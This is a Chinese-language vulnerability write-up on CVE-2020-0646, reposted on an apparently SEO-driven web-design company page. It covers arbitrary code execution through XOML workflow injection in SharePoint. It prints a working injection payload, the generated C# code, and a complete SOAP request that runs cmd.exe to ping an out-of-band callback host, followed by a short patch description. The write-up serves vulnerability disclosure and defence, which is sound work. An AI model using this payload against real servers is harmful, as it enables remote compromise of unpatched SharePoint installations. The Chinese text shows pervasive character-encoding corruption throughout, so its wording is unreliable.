如何進(jìn)行SharePoint中的遠(yuǎn)程代碼執(zhí)行漏洞分析

這篇文章給大家介紹如何進(jìn)行SharePoint中的遠(yuǎn)程代碼執(zhí)行漏洞分析，內(nèi)容非常詳細(xì)，感興趣的小伙伴們可以參考借鑒，希望對(duì)大家能有所幫助。

創(chuàng)新互聯(lián)建站是一家專(zhuān)注于網(wǎng)站建設(shè)、做網(wǎng)站與策劃設(shè)計(jì),羅定網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)建站做網(wǎng)站,專(zhuān)注于網(wǎng)站建設(shè)10余年,網(wǎng)設(shè)計(jì)領(lǐng)域的專(zhuān)業(yè)建站公司;建站業(yè)務(wù)涵蓋:羅定等地區(qū)。羅定做網(wǎng)站價(jià)格咨詢(xún):028-86922220

2019年11月份，安全研究人員在微軟SharePoint Online的工作流中發(fā)現(xiàn)了一個(gè)代碼注入漏洞，并將其上報(bào)給微軟公司。攻擊者一旦成功利用該漏洞，將能夠在目標(biāo)系統(tǒng)中實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。微軟在獲取到漏洞信息之后，第一時(shí)間修復(fù)了在線(xiàn)平臺(tái)上的相關(guān)漏洞，但是卻到2020年的1月份才修復(fù).NET Framework中的相關(guān)問(wèn)題。因此，如果你的SharePoint On-Rremise版本沒(méi)有安裝2020年1月份的.NET補(bǔ)丁，那你將仍然會(huì)受到該漏洞的影響。

需要注意的是，如果你的IIS配置支持.XOML擴(kuò)展，那么在文件上傳時(shí)你同樣有可能受到該漏洞的影響。

CVE-2020-0646漏洞分析

在編譯XOML格式文件時(shí)，攻擊者可以利用System.Workflow.Activities命名空間中的某些參數(shù)來(lái)在SharePoint服務(wù)器上執(zhí)行任意代碼。正是因?yàn)楣粽吣軌驁?zhí)行任意代碼，因此該漏洞也能被用來(lái)繞過(guò)Workflow編譯器的nocode選項(xiàng)。

下面的XOML文件顯示的是一個(gè)使用CallExternalMethodActivity類(lèi)的樣例：

<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">  <CallExternalMethodActivity x:Name="codeActivity1" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe","/c calc");private/**/void/**/foobar(){//' /></SequentialWorkflowActivity>

在編譯過(guò)程中，攻擊者可以將InterfaceType屬性的值注入到剛剛生成的C#臨時(shí)文件中：

…    private void InitializeComponent()    {        …        this.codeActivity1.InterfaceType = typeof(System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe","/c calc");private/**/void/**/foobar(){//);              …    }…

完成上述操作之后，攻擊者就可以繞過(guò)原函數(shù)并嘗試實(shí)現(xiàn)任意代碼執(zhí)行了。值得一提的是，在上述例子中，當(dāng)InterfaceType屬性受到影響時(shí)，其他String類(lèi)型的屬性（例如MethodName）已正確驗(yàn)證或轉(zhuǎn)義。

除此之外，CodeActivity類(lèi)中的ExecuteCode參數(shù)同樣會(huì)受這種利用方式的影響，但是我們無(wú)法在SharePoint的在線(xiàn)版本中針對(duì)該參數(shù)進(jìn)行利用和攻擊，只能適用于On-Premise版本。當(dāng)然了，這里很可能還有其他的Activity類(lèi)會(huì)受到潛在影響。

比如說(shuō)，在下面的例子中，攻擊者使用了如下HTTP請(qǐng)求在SharePoint Online版本上執(zhí)行了任意代碼：

POST http://[REDACTED].sharepoint.com/_vti_bin/webpartpages.asmx HTTP/1.1Date: Tue, 29 Oct 2019 14:26:21 GMTMIME-Version: 1.0Accept: */*SOAPAction: http://microsoft.com/sharepoint/webpartpages/ValidateWorkflowMarkupAndCreateSupportObjectsUser-Agent: Mozilla/4.0 (compatible; MS FrontPage 15.0)Host: [REDACTED].sharepoint.comAccept-Language: en-us, en;q=0.1Accept: auth/sicilyX-FORMS_BASED_AUTH_ACCEPTED: TContent-Type: text/xml; charset=utf-8X-Vermeer-Content-Type: text/xml; charset=utf-8Accept-encoding: gzip, deflateConnection: Keep-AlivePragma: no-cacheContent-Length: 1031Cookie: [REDACTED]<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages"><workflowMarkupText><![CDATA[<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"                            xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">  <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe","/c ping o9ydzn3p7ed579lepxolocqyqpwik7.[redactedBurpCollabServer]");private/**/void/**/foobar(){//' /></SequentialWorkflowActivity>]]></workflowMarkupText><rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>

攻擊完成之后，我們就可以查看到主機(jī)需要解析的對(duì)應(yīng)DNS名稱(chēng)了：

除此之外，攻擊者同樣可以利用上述請(qǐng)求來(lái)利用On-Premise版本中的漏洞并實(shí)施攻擊。

安裝了漏洞CVE-2020-0646的補(bǔ)丁之后，SharePoint的工作流將會(huì)檢查所有的XML元素及屬性，以確保它們只包含有限數(shù)量的合法字符。因此，當(dāng)使用所選的nocode選項(xiàng)時(shí)，攻擊者將無(wú)法在默認(rèn)配置中向生成的C#代碼注入任意代碼了。

關(guān)于如何進(jìn)行SharePoint中的遠(yuǎn)程代碼執(zhí)行漏洞分析就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到。

網(wǎng)站標(biāo)題：如何進(jìn)行SharePoint中的遠(yuǎn)程代碼執(zhí)行漏洞分析
文章鏈接：http://www.jbt999.com/article16/gseogg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供ChatGPT、商城網(wǎng)站、軟件開(kāi)發(fā)、網(wǎng)站排名、網(wǎng)站改版、網(wǎng)站導(dǎo)航

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話(huà)：028-86922220；郵箱：[email protected]。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)